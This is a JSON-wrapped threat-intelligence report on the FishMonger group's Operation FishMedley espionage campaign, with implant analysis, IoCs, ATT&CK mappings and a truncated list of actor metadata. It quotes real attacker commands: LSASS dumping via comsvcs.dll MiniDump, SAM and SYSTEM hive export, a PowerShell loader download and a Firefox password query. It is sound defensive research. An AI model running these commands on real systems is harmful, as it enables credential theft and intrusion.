{ "id": "be1643d6-10d9-4e13-bae1-7a9357c5b08e", "created_at": "2026-04-06T00:21:29.763244Z", "updated_at": "2026-04-10T03:36:48.219803Z", "deleted_at": null, "sha1_hash": "7c1b6bb1a9104b7082ee7ef7222b20dd95890321", "title": "Operation FishMedley targeting governments, NGOs, and think tanks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 641241, "plain_text": "Operation FishMedley targeting governments, NGOs, and think tanks\r\nBy Matthieu Faou\r\nArchived: 2026-04-02 10:46:12 UTC\r\nOn March 5th, 2025, the US DOJ unsealed an indictment against employees of the Chinese contractor I‑SOON for their\r\ninvolvement in multiple global espionage operations. Those include attacks that we previously documented and attributed to\r\nthe FishMonger APT group – I‑SOON’s operational arm – including the compromise of seven organizations that we\r\nidentified as being targeted in a 2022 campaign that we named Operation FishMedley.\r\nKey points of this blogpost:\r\nVerticals targeted during Operation FishMedley include governments, NGOs, and think tanks, across Asia,\r\nEurope, and the United States.\r\nOperators used implants – such as ShadowPad, SodaMaster, and Spyder – that are common or exclusive to\r\nChina-aligned threat actors.\r\nWe assess with high confidence that Operation FishMedley was conducted by the FishMonger APT group.\r\nIndependent of the DOJ indictment, we determined that FishMonger is operated by I‑SOON.\r\nFishMonger profile\r\nFishMonger – a group believed to be operated by the Chinese contractor I‑SOON (see our Q4 2023-Q1 2024 APT Activity\r\nReport) – falls under the Winnti Group umbrella and is most likely operating out of China, from the city of Chengdu where\r\nI‑SOON’s office was located. FishMonger is also known as Earth Lusca, TAG‑22, Aquatic Panda, or Red Dev 10. We\r\npublished an analysis of this group in early 2020 when it heavily targeted universities in Hong Kong during the civic\r\nprotests that started in June 2019. We initially attributed the incident to Winnti Group but have since revised our attribution\r\nto FishMonger.\r\nThe group is known to operate watering-hole attacks, as reported by Trend Micro. FishMonger’s toolset includes\r\nShadowPad, Spyder, Cobalt Strike, FunnySwitch, SprySOCKS, and the BIOPASS RAT.\r\nOverview\r\nOn March 5th, 2025, the US Department of Justice published a press release and unsealed an indictment against I‑SOON\r\nemployees and officers of China’s Ministry of Public Security involved in multiple espionage campaigns from 2016 to 2023.\r\nThe FBI also added those named in the indictment to its “most wanted” list and published a poster, as seen in Figure 1.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 1 of 13\n\nFigure 1. Names of FishMonger / I‑SOON members (source: FBI)\r\nThe indictment describes several attacks that are strongly related to what we published in a private APT intelligence report\r\nin early 2023. In this blogpost, we share our technical knowledge about this global campaign that targeted governments,\r\nNGOs, and think tanks across Asia, Europe, and the United States. We believe that this information complements the\r\nrecently published indictment.\r\nDuring 2022, we investigated several compromises where implants such as ShadowPad and SodaMaster, which are\r\ncommonly employed by China-aligned threat actors, were used. We were able to cluster seven independent incidents for this\r\nblogpost and have named that campaign Operation FishMedley.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 2 of 13\n\nFishMonger and I-SOON\r\nDuring our research, we were able to independently determine that FishMonger is an espionage team operated by I‑SOON, a\r\nChinese contractor based in Chengdu that suffered an infamous document leak in 2024 – see this comprehensive analysis\r\nfrom Harfang Labs.\r\nVictimology\r\nTable 1 shows details about the seven victims we identified. The verticals and countries are diverse, but most are of obvious\r\ninterest to the Chinese government.\r\nTable 1. Victimology details\r\nVictim Date of compromise Country Vertical\r\nA January 2022 Taiwan Governmental organization.\r\nB January 2022 Hungary Catholic organization.\r\nC February 2022 Turkey Unknown.\r\nD March 2022 Thailand Governmental organization.\r\nE April 2022 United States Catholic charity operating worldwide.\r\nF June 2022 United States NGO – mainly active in Asia.\r\nG October 2022 France Geopolitical think tank.\r\nTable 2 summarizes the implants used during each intrusion of Operation FishMedley.\r\nTable 2. Details of the implants used against each victim\r\nVictim | Tool ScatterBee-packed ShadowPad Spyder SodaMaster RPipeCommander\r\nA ●      \r\nB     ●  \r\nC     ●  \r\nD ● ●   ●\r\nE     ●  \r\nF ●   ●  \r\nG     ●  \r\nTechnical analysis\r\nInitial access\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 3 of 13\n\nWe were unable to identify the initial compromise vectors. For most cases, the attackers seemed to have had privileged\r\naccess inside the local network, such as domain administrator credentials.\r\nAt Victim D, the attackers gained access to an admin console and used it to deploy implants on other machines in the local\r\nnetwork. It is probable that they first compromised the machine of a sysadmin or security analyst and then stole credentials\r\nthat allowed them to connect to the console.\r\nAt Victim F, the implants were delivered using Impacket, which means that the attackers somehow previously compromised\r\na high-privilege domain account.\r\nLateral movement\r\nAt Victim F, the operators also used Impacket to move laterally. They gathered information on other local machines and\r\ninstalled implants.\r\nTable 3 shows that the operators first did some manual reconnaissance using quser.exe, wmic.exe, and ipconfig.exe. Then\r\nthey tried to get credentials and other secrets by dumping the local security authority subsystem service (LSASS) process\r\n(PID 944). The PID of the process was obtained via tasklist /svc and the dump was performed using comsvcs.dll, which is a\r\nknown living-off-the-land binary (LOLBIN). Note that it is likely that the attackers executed quser.exe to see whether other\r\nusers or admins were also logged in, meaning privileged accesses were present in LSASS. According to Microsoft\r\ndocumentation, to use this command the attacker must have Full Control permission or special access permission.\r\nThey also saved the registry hives sam.hive and system.hive, which can both contain secrets or credentials.\r\nFinally, they tried to dump the LSASS process again, using a for loop iterating over the output from tasklist.exe. We have\r\nseen this same code used on other machines, so it is a good idea to block or at least alert on it.\r\nTable 3. Commands executed via Impacket on a machine at Victim F\r\nTimestamp\r\n(UTC)\r\nCommand\r\n2022-06-21\r\n07:34:07\r\nquser\r\n2022-06-21\r\n14:41:23\r\nwmic os get lastbootuptime\r\n2022-06-21\r\n14:41:23\r\nipconfig /all\r\n2022-06-21\r\n14:41:23\r\ntasklist /svc\r\n2022-06-21\r\n14:41:23\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c\r\n\"C:\\Windows\\System32\\rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 944\r\nc:\\users\\public\\music\\temp.tmp full\"\r\n2022-06-21\r\n14:41:23\r\nreg save hklm\\sam C:\\users\\public\\music\\sam.hive\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 4 of 13\n\nTimestamp\r\n(UTC)\r\nCommand\r\n2022-06-21\r\n14:41:23\r\nreg save hklm\\system C:\\users\\public\\music\\system.hive\r\n2022-06-21\r\n14:41:23\r\nnet user\r\n2022-06-22\r\n07:05:37\r\ntasklist /v\r\n2022-06-22\r\n07:07:33\r\ndir c:\\users\r\n2022-06-22\r\n09:47:52\r\nfor /f \"tokens=1,2 delims= \" ^%A in ('\"tasklist /fi \"Imagename eq lsass.exe\" | find\r\n\"lsass\"\"') do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump ^%B\r\n\\Windows\\Temp\\YDWS6P.xml full\r\nToolset\r\nShadowPad\r\nShadowPad is a well-known and privately sold modular backdoor, known to only be supplied to China-aligned APT groups,\r\nincluding FishMonger and SparklingGoblin, as documented by SentinelOne. In Operation FishMedley, the attackers used a\r\nShadowPad version packed with ScatterBee.\r\nAt Victim D, the loader was downloaded using the following PowerShell command:\r\npowershell (new-object\r\nSystem.Net.WebClient).DownloadFile(\"http://\u003cvictim’s_web_server_IP_address\u003e/Images/menu/log.dll\";\"c:\\users\\public\\log.dll\"\r\nThis shows that the attackers compromised a web server at the victim’s organization to use it as a staging server for their\r\nmalware.\r\nAt Victim F, Firefox was used to download the loader, from http://5.188.230[.]47/log.dll. We don’t know whether attackers\r\nhad interactive access to the machine, whether another piece of malware was running in the Firefox process, or whether the\r\nvictim was redirected to the download page, say via a watering-hole attack.\r\nlog.dll is side-loaded by an old Bitdefender executable (original name: BDReinit.exe) and loads ShadowPad from a file\r\nnamed log.dll.dat, which can be decrypted using the scripts provided in PwC’s GitHub repository.\r\nWe did not recover the log.dll.dat from the victim’s machine, but we found a fake Adobe Flash installer on VirusTotal with\r\nthe identical log.dll file. The configuration of the ShadowPad payload is provided in Table 4.\r\nTable 4. ShadowPad configuration\r\nField Decrypted value\r\nTimestamp 3/14/2022 10:52:16 PM\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 5 of 13\n\nField Decrypted value\r\nCampaign code 2203\r\nFile path %ALLUSERSPROFILE%\\DRM\\Test\\\r\nSpoofed name Test.exe\r\nLoader filename log.dll\r\nPayload filename log.dll.dat\r\nService name MyTest2\r\nAlternative service name MyTest2\r\nAlternative service name MyTest2\r\nRegistry key path SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nService description MyTest2\r\nProgram to inject into %ProgramFiles%\\Windows Media Player\\wmplayer.exe\r\nAlternative injection target N/A\r\nAlternative injection target N/A\r\nAlternative injection target %windir%\\system32\\svchost.exe\r\nC\u0026C URL TCP://api.googleauthenticatoronline[.]com:443\r\nAlternative C\u0026C URL UDP://api.googleauthenticatoronline[.]com:443\r\nAlternative C\u0026C URL N/A\r\nAlternative C\u0026C URL N/A\r\nProxy info string SOCKS4\\n\\n\\n\\n\\n\r\nProxy info string SOCKS4\\n\\n\\n\\n\\n\r\nProxy info string SOCKS5\\n\\n\\n\\n\\n\r\nProxy info string SOCKS5\\n\\n\\n\\n\\n\r\nNote that from March 20th, 2022 to November 2nd, 2022, the C\u0026C domain resolved to 213.59.118[.]124, which is\r\nmentioned in a VMware blogpost about ShadowPad.\r\nSpyder\r\nAt Victim D, we detected another backdoor typically used by FishMonger: Spyder, a modular implant that was analyzed in\r\ngreat detail by Dr.Web.\r\nA Spyder loader was downloaded from http://\u003ca_victim’s_web_server_IP_address\u003e/Images/menu/aa.doc and dropped to\r\nC:\\Users\\Public\\task.exe around 18 hours after ShadowPad was installed.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 6 of 13\n\nThe loader – see Figure 2; reads the file c:\\windows\\temp\\guid.dat and decrypts its contents using AES-CBC. The\r\nencryption key is hardcoded: F4 E4 C6 9E DE E0 9E 82 00 00 00 00 00 00 00 00. The initialization vector (IV) is the first\r\neight bytes of the key. Unfortunately, we were unable to recover the guid.dat file.\r\nFigure 2. Spyder loader\r\nThen, the loader injects the decoded content – likely shellcode – into itself (task.exe process) as seen in Figure 3.\r\nFigure 3. Spyder loader – injection part\r\nDespite not obtaining the encrypted final payload, our product did detect a Spyder payload in memory and it was almost\r\nidentical to the Spyder variant documented by Dr.Web. The C\u0026C server was hardcoded to 61.238.103[.]165.\r\nInterestingly, multiple subdomains of junlper[.]com, a known Spyder C\u0026C domain and a weak homoglyph domain to\r\njuniper.net, resolved to 61.238.103[.]165 in 2022.\r\nA self-signed TLS certificate was present on port 443 of the server from May to December 2022, with the thumbprint\r\n89EDCFFC66EDA3AEB75E140816702F9AC73A75F0. According to SentinelOne, it is a certificate used by FishMonger\r\nfor its C\u0026C servers.\r\nSodaMaster\r\nSodaMaster is a backdoor that was documented by Kaspersky in 2021. APT10 was the first group known to have access to\r\nthis backdoor but Operation FishMedley indicates that it may now be shared among multiple China-aligned APT groups.\r\nSodaMaster can only be found decrypted in memory and that’s where we detected it. Even though we did not recover the\r\nfull loading chain, we have identified a few samples that are the first step of the chain.\r\nSodaMaster loaders\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 7 of 13\n\nWe found six different malicious DLLs that are abusing legitimate executables via DLL side-loading. They all implement\r\nthe same decryption and injection routine.\r\nFirst, the loader reads a hardcoded file, for example debug.png, and XOR decrypts it using a hardcoded 239-byte key. Table\r\n5 summarizes the different loaders. Note that the XOR key is also different in each sample, but too long to be included in the\r\ntable. Also note that we did not recover any of these encrypted payloads.\r\nTable 5. SodaMaster loaders\r\nSHA-1 DLL name Payload filename\r\n3C08C694C222E7346BD8\r\n633461C5D19EAE18B661\r\nDrsSDK.dll \u003ccurrent_directory\u003e\\debug.png\r\nD8B631C551845F892EBB\r\n5E7D09991F6C9D4FACAD\r\nlibvlc.dll \u003ccurrent_directory\u003e\\vlc.cnf\r\n3A702704653EC847CF91\r\n21E3F454F3DBE1F90AFD\r\nsafestore64.dll \u003ccurrent_directory\u003e\\Location\r\n3630F62771360540B667\r\n01ABC8F6C868087A6918\r\nDeElevator64.dll \u003ccurrent_directory\u003e\\Location\r\nA4F68D0F1C72C3AC9D70\r\n919C17DC52692C43599E\r\nlibmaxminddb-0.dllC:\\windows\\system32\\\r\nMsKeyboardFilterapi.dll\r\n5401E3EF903AFE981CFC\r\n2840D5F0EF2F1D83B0BF\r\nsafestore641.dll \u003ccurrent_directory\u003e\\Location\r\nThen, the decrypted buffer is injected into a newly created, suspended svchost.exe process – see Figure 4.\r\nFigure 4. SodaMaster injection\r\nFinally, the shellcode is executed using either CreateRemoteThread (on Windows XP or older versions) or, on newer\r\nWindows versions, via NtCreateThreadEx as shown in Figure 5.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 8 of 13\n\nFigure 5. Execution of the injected payload\r\nThe last four loaders in Table 5 have additional features:\r\nThey have an export named getAllAuthData that implements a password stealer for Firefox. It reads the Firefox\r\nSQLite database and runs the query SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM\r\nmoz_logins.\r\nThe last three loaders persist as a service named Netlock, MsKeyboardFiltersrv, and downmap, respectively.\r\nSodaMaster payload\r\nAs mentioned above, the SodaMaster payload was publicly analyzed by Kaspersky and the samples we’ve found don’t seem\r\nto have evolved much. They still implement the same four backdoor commands (d, f, l, and s) that were present in 2021.\r\nTable 6 shows the configurations from the four different SodaMaster payloads that we identified. Operators used a different\r\nC\u0026C server per victim, but we can see that Victims B and C share the same hardcoded RSA key.\r\nTable 6. SodaMaster configuration\r\nVictim C\u0026C server RSA key\r\nB 162.33.178[.]23\r\nMIGJAoGBAOPjO7DslhZvp0t8HNU/NWPIwstzwi61JlevD6TJtv/TZuN6Cg\r\nXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDV\r\nDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeV\r\nZoKjcxAgMBAAE=\r\nC 78.141.202[.]70\r\nMIGJAoGBAOPjO7DslhZvp0t8HNU/NWPIwstzwi61JlevD6TJtv/TZuN6Cg\r\nXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDV\r\nDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeV\r\nZoKjcxAgMBAAE=\r\nF 192.46.223[.]211\r\nMIGJAoGBAMYOg+eoTREKaAESDXt3Uh3Y4J84ObD1dfl3dOji0G24UlbHdj\r\nUk3e+/dtHjPsRZOfdLkwtz8SIZZVVt3pJGxgx9oyRtckJ6zsrYm/JIK+7b\r\nXikGf7sgs5zCItcaNJ1HFKoA9YQpfxXrwoHMCkaGb9NhsdsQ2k2q4jT68H\r\nygzq19AgMBAAE=\r\nG 168.100.10[.]136\r\nMIGJAoGBAJ0EsHDp5vtk23KCxEq0tAocvMwn63vCqq0FVmXsY+fvD0tP6N\r\nlc7k0lESpB4wGioj2xuhQgcEjXEkYAIPGiefYFovxMPVuzp1FsutZa5SD6\r\n+4NcTRKsRsrMTZm5tFRuuENoEVmOSy3XoAS00mu4MM5tt7KKDlaczzhYJi\r\n21PGk5AgMBAAE=\r\nRPipeCommander\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 9 of 13\n\nAt Victim D, we captured a previously unknown implant in the same process where Spyder was running. It was probably\r\nloaded from disk or downloaded by Spyder. Because its DLL export name was rcmd64.dll, we named this implant\r\nRPipeCommander.\r\nRPipeCommander is multithreaded and uses IoCompletionPort to manage the I/O requests of the multiple threads. It creates\r\nthe named pipe \\\\.\\Pipe\\CmdPipe\u003cPID\u003e, where \u003cPID\u003e is the current process ID, and reads from and writes into this pipe.\r\nRPipeCommander is a reverse shell that accepts three commands via the named pipe:\r\nh (0x68): create a cmd.exe process and bind pipes to the process to send commands and read the output.\r\ni (0x69): Write a command in the existing cmd.exe process or read the output of the previous command.\r\nj (0x6A): exit the cmd.exe process by writing exit\\r\\n in the command shell.\r\nNote that it seems we only have the server side of RPipeCommander. It is likely that a second component, a client, is used to\r\nsend commands to the server from another machine on the local network.\r\nFinally, RPipeCommander is written in C++ and RTTI information was included in the captured samples, allowing us to\r\nobtain some of the class names:\r\nCPipeServer\r\nCPipeBuffer\r\nCPipeSrvEvent\r\nCPipeServerEventHandler\r\nOther tools\r\nIn addition to the main implants described above, the attackers used a few additional tools to collect or exfiltrate data, which\r\nwe describe in Table 7.\r\nTable 7. Other tools used during Operation FishMedley\r\nFilename Details\r\nC:\\Windows\\system32\\\r\nsasetup.dll\r\nCustom password filter. The export PasswordChangeNotify is called when the user changes\r\ntheir password, and it writes the new password on disk in the current working directory in a\r\nlog file named etuper.log. Note that it can also exfiltrate the password by sending a POST\r\nrequest to a hardcoded C\u0026C server, with flag=\u003cpassword\u003e in the POST data. However, this\r\nfunctionality is not enabled in this specific sample and there is no C\u0026C server in the\r\nconfiguration.\r\nC:\\Windows\\debug\\\r\nsvhost.tmp\r\nThe fscan network scanner, available on GitHub.\r\nC:\\nb.exe nbtscan – a NetBIOS scanner.\r\nC:\\Users\\public\\\r\ndrop.zip\r\nIt contains only dbxcli – a tool written in Go to interact with Dropbox. It was likely used to\r\nexfiltrate data from the victim’s network, but we haven’t retrieved any information about the\r\nattackers’ account.\r\nNote that, despite the.zip extension, this is a CAB file. It was downloaded from\r\nhttp://45.76.165[.]227/wECqKe529r.png.\r\nAlso note that dbxcli seems to have been compiled by the attackers, since the hash (SHA-1:\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 10 of 13\n\nFilename Details\r\n2AD82FFA393937A2353096FE2A2209E0EBC1C9D7) has a very low prevalence in the\r\nwild.\r\nConclusion\r\nIn this blogpost, we have shown how FishMonger conducted a campaign against high-profile entities all around the world\r\nand was the subject of a US DOJ indictment in March 2025. We also showed that the group is not shy about reusing well-known implants, such as ShadowPad or SodaMaster, even long after they have been publicly described. Finally, we have\r\nindependently confirmed that FishMonger is a team that is part of the Chinese company I‑SOON.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com. \r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit\r\nthe ESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository.\r\nFiles\r\nSHA-1 Filename Detection Description\r\nD61A4387466A0C999981\r\n086C2C994F2A80193CE3\r\nN/A Win32/Agent.ADVC ShadowPad dropper.\r\n918DDD842787D64B244D\r\n353BFC0E14CC037D2D97\r\nlog.dll Win32/Agent.ADVC\r\nScatterBee-packed\r\nShadowPad loader.\r\nF12C8CEC813257890F48\r\n56353ABD9F739DEED890\r\ntask.exe Win64/Agent.BEJ Spyder loader.\r\n3630F62771360540B667\r\n01ABC8F6C868087A6918\r\nDeElevator64.dll Win64/PSW.Agent.CU SodaMaster loader.\r\n3C08C694C222E7346BD8\r\n633461C5D19EAE18B661\r\nDrsSDK.dll Win64/Agent.CAC SodaMaster loader.\r\n5401E3EF903AFE981CFC\r\n2840D5F0EF2F1D83B0BF\r\nsafestore64.dll Win64/PSW.Agent.CU SodaMaster loader.\r\nA4F68D0F1C72C3AC9D70\r\n919C17DC52692C43599E\r\nlibmaxminddb\r\n-0.dll\r\nWin64/PSW.Agent.CU SodaMaster loader.\r\nD8B631C551845F892EBB\r\n5E7D09991F6C9D4FACAD\r\nlibvlc.dll Win64/Agent.BFZ SodaMaster loader.\r\n3F5F6839C7DCB1D164E4\r\n813AF2E30E9461AB35C1\r\nsasetup.dll Win64/PSW.Agent.CB\r\nMalicious password\r\nfilter.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 11 of 13\n\nNetwork\r\nIP Domain Hosting provider First seen Details\r\n213.59.118[.]124\r\napi.googleauthenticatoro\r\nnline[.]com\r\nSTARK INDUSTRIES 2022‑03‑20\r\nShadowPad C\u0026C\r\nserver.\r\n61.238.103[.]165 N/A IRT-HKBN-HK 2022‑03‑10 Spyder C\u0026C server.\r\n162.33.178[.]23 N/A BL Networks 2022‑03‑28\r\nSodaMaster C\u0026C\r\nserver.\r\n78.141.202[.]70 N/A\r\nThe Constant\r\nCompany\r\n2022‑05‑18\r\nSodaMaster C\u0026C\r\nserver.\r\n192.46.223[.]211 N/A\r\nAkamai Connected\r\nCloud\r\n2022‑06‑22\r\nSodaMaster C\u0026C\r\nserver.\r\n168.100.10[.]136 N/A BL Networks 2022‑05‑12\r\nSodaMaster C\u0026C\r\nserver.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 16 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nResource\r\nDevelopment\r\nT1583.004\r\nAcquire Infrastructure:\r\nServer\r\nFishMonger rented servers at several hosting\r\nproviders.\r\nT1583.001\r\nAcquire Infrastructure:\r\nDomains\r\nFishMonger bought domains and used them for\r\nC\u0026C traffic.\r\nExecution\r\nT1059.001\r\nCommand-Line Interface:\r\nPowerShell\r\nFishMonger downloaded ShadowPad using\r\nPowerShell.\r\nT1059.003\r\nCommand-Line Interface:\r\nWindows Command Shell\r\nFishMonger deployed Spyder using a BAT script.\r\nT1072 Software Deployment Tools\r\nFishMonger gained access to a local admin console,\r\nabusing it to run commands on other machines in\r\nthe victim’s network.\r\nPersistence T1543.003\r\nCreate or Modify System\r\nProcess: Windows Service\r\nSome SodaMaster loaders persist via a Windows\r\nservice.\r\nDefense\r\nEvasion\r\nT1574.002\r\nHijack Execution Flow: DLL\r\nSide-Loading\r\nShadowPad is loaded by a DLL named log.dll that is\r\nside-loaded by a legitimate Bitdefender executable.\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nShadowPad, Spyder, and SodaMaster are decrypted\r\nand loaded into memory.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 12 of 13\n\nTactic ID Name Description\r\nCredential\r\nAccess\r\nT1555.003\r\nCredentials from Password\r\nStores: Credentials from Web\r\nBrowsers\r\nSome SodaMaster loaders can extract passwords\r\nfrom the local Firefox database.\r\nT1556.002\r\nModify Authentication\r\nProcess: Password Filter\r\nDLL\r\nFishMonger used a custom password filter DLL that\r\ncan write passwords to disk or exfiltrate them to a\r\nremote server.\r\nT1003.001\r\nOS Credential Dumping:\r\nLSASS Memory\r\nFishMonger dumped LSASS memory using\r\nrundll32 C:\\windows\\system32\\comsvcs.dll,\r\nMiniDump.\r\nT1003.002\r\nOS Credential Dumping:\r\nSecurity Account Manager\r\nFishMonger dumped the security account manager\r\nusing reg save hklm\\sam\r\nC:\\users\\public\\music\\sam.hive.\r\nDiscovery\r\nT1087.001\r\nAccount Discovery: Local\r\nAccount\r\nFishMonger executed net user.\r\nT1016\r\nSystem Network\r\nConfiguration Discovery\r\nFishMonger executed ipconfig /all.\r\nT1007 System Service Discovery FishMonger executed tasklist /svc.\r\nT1057 Process Discovery FishMonger executed tasklist /v.\r\nLateral\r\nMovement\r\nT1021.002\r\nRemote Services:\r\nSMB/Windows Admin\r\nShares\r\nFishMonger used Impacket to deploy malware on\r\nother machines in the local network.\r\nCommand and\r\nControl\r\nT1095\r\nNon-Application Layer\r\nProtocol\r\nShadowPad communicates over raw TCP and UDP.\r\nSource: https://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "Malpedia" ], "references": [ "https://www.welivesecurity.com/en/eset-research/operation-fishmedley/" ], "report_names": [ "operation-fishmedley" ], "threat_actors": [ { "id": "ec14074c-8517-40e1-b4d7-3897f1254487", "created_at": "2023-01-06T13:46:38.300905Z", "updated_at": "2026-04-10T02:00:02.918468Z", "deleted_at": null, "main_name": "APT10", "aliases": [ "Red Apollo", "HOGFISH", "BRONZE RIVERSIDE", "G0045", "TA429", "Purple Typhoon", "STONE PANDA", "Menupass Team", "happyyongzi", "CVNX", "Cloud Hopper", "ATK41", "Granite Taurus", "POTASSIUM" ], "source_name": "MISPGALAXY:APT10", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "19935e32-f1a5-462d-8934-8b1c3bf3b5f2", "created_at": "2022-10-25T16:07:23.36465Z", "updated_at": "2026-04-10T02:00:04.565476Z", "deleted_at": null, "main_name": "Aquatic Panda", "aliases": [ "G0143" ], "source_name": "ETDA:Aquatic Panda", "tools": [ "Agentemis", "Bladabindi", "Cobalt Strike", "CobaltStrike", "Fishmaster", "JollyJellyfish", "Jorik", "cobeacon", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "c8b57a00-18f4-4e49-9954-849de5e97506", "created_at": "2023-11-05T02:00:08.065073Z", "updated_at": "2026-04-10T02:00:03.395154Z", "deleted_at": null, "main_name": "SparklingGoblin", "aliases": [], "source_name": "MISPGALAXY:SparklingGoblin", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5bbced13-72f7-40dc-8c41-dcce75bf885e", "created_at": "2022-10-25T15:50:23.695735Z", "updated_at": "2026-04-10T02:00:05.335976Z", "deleted_at": null, "main_name": "Winnti Group", "aliases": [ "Winnti Group" ], "source_name": "MITRE:Winnti Group", "tools": [ "PipeMon", "Winnti for Windows", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "6a0effeb-3ee2-4a67-9a9f-ef5c330b1c3a", "created_at": "2023-09-07T02:02:47.827633Z", "updated_at": "2026-04-10T02:00:04.873323Z", "deleted_at": null, "main_name": "RedHotel", "aliases": [ "Operation FishMedley", "RedHotel", "TAG-22" ], "source_name": "ETDA:RedHotel", "tools": [ "Agentemis", "BIOPASS", "BIOPASS RAT", "BleDoor", "Brute Ratel", "Brute Ratel C4", "Cobalt Strike", "CobaltStrike", "FunnySwitch", "POISONPLUG.SHADOW", "RbDoor", "RibDoor", "RouterGod", "ShadowPad Winnti", "SprySOCKS", "Spyder", "Winnti", "XShellGhost", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "ba9fa308-a29a-4928-9c06-73aafec7624c", "created_at": "2024-05-01T02:03:07.981061Z", "updated_at": "2026-04-10T02:00:03.750803Z", "deleted_at": null, "main_name": "BRONZE RIVERSIDE", "aliases": [ "APT10 ", "CTG-5938 ", "CVNX ", "Hogfish ", "MenuPass ", "MirrorFace ", "POTASSIUM ", "Purple Typhoon ", "Red Apollo ", "Stone Panda " ], "source_name": "Secureworks:BRONZE RIVERSIDE", "tools": [ "ANEL", "AsyncRAT", "ChChes", "Cobalt Strike", "HiddenFace", "LODEINFO", "PlugX", "PoisonIvy", "QuasarRAT", "QuasarRAT Loader", "RedLeaves" ], "source_id": "Secureworks", "reports": null }, { "id": "c7d9878a-e691-4c6f-81ae-84fb115a1345", "created_at": "2022-10-25T16:07:23.359506Z", "updated_at": "2026-04-10T02:00:04.556639Z", "deleted_at": null, "main_name": "APT 41", "aliases": [ "BrazenBamboo", "Bronze Atlas", "Double Dragon", "Earth Baku", "G0096", "Grayfly", "Operation ColunmTK", "Operation CuckooBees", "Operation ShadowHammer", "Red Kelpie", "SparklingGoblin", "TA415", "TG-2633" ], "source_name": "ETDA:APT 41", "tools": [ "9002 RAT", "ADORE.XSEC", "ASPXSpy", "ASPXTool", "AceHash", "Agent.dhwf", "Agentemis", "AndroidControl", "AngryRebel", "AntSword", "BLUEBEAM", "Barlaiy", "BlackCoffee", "Bladabindi", "BleDoor", "CCleaner Backdoor", "CHINACHOPPER", "COLDJAVA", "China Chopper", "ChyNode", "Cobalt Strike", "CobaltStrike", "Crackshot", "CrossWalk", "CurveLast", "CurveLoad", "DAYJOB", "DBoxAgent", "DEADEYE", "DEADEYE.APPEND", "DEADEYE.EMBED", "DEPLOYLOG", "DIRTCLEANER", "DUSTTRAP", "Derusbi", "Destroy RAT", "DestroyRAT", "DodgeBox", "DragonEgg", "ELFSHELF", "EasyNight", "Farfli", "FunnySwitch", "Gh0st RAT", "Ghost RAT", "HDD Rootkit", "HDRoot", "HKDOOR", "HOMEUNIX", "HUI Loader", "HidraQ", "HighNoon", "HighNote", "Homux", "Hydraq", "Jorik", "Jumpall", "KEYPLUG", "Kaba", "Korplug", "LATELUNCH", "LOLBAS", "LOLBins", "LightSpy", "Living off the Land", "Lowkey", "McRAT", "MdmBot", "MessageTap", "Meterpreter", "Mimikatz", "MoonBounce", "MoonWalk", "Motnug", "Moudour", "Mydoor", "NTDSDump", "PACMAN", "PCRat", "PINEGROVE", "PNGRAT", "POISONPLUG", "POISONPLUG.SHADOW", "POTROAST", "PRIVATELOG", "PipeMon", "PlugX", "PortReuse", "ProxIP", "ROCKBOOT", "RbDoor", "RedDelta", "RedXOR", "RibDoor", "Roarur", "RouterGod", "SAGEHIRE", "SPARKLOG", "SQLULDR2", "STASHLOG", "SWEETCANDLE", "ScrambleCross", "Sensocode", 